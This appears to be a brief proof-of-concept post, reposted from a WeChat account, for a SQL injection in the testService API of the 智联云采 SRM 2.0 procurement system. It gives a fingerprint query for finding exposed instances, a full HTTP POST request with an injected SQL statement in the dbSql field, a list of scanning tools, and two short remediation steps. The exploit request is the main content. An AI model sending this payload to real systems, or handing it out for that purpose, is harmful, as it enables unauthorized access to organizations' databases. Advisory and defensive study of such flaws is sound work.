title=="SRM 2.0"
POST /adpweb/a/ica/api/testService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/json

{
  "dbId": "1001",
  "dbSql": "#set ($lang = $lang) SELECT * FROM v$version",
  "responeTemplate": "{\"std_data\": {\"execution\": {\"sqlcode\": \"$execution.sqlcode\", \"description\": \"$execution.description\"}}}",
  "serviceCode": "q",
  "serviceName": "q",
  "serviceParams": "{\"lang\":\"zh_CN\"}"
}
sqlmap verification
nuclei
afrog
xray
1. Remove the system from the internet-exposed attack surface, or restrict access to the interface.
2. Watch for vendor patches and apply them promptly, or upgrade to a fixed version.
Originally published on the WeChat official account (nday POC): 智联云采 SRM 2.0 testService SQL injection vulnerability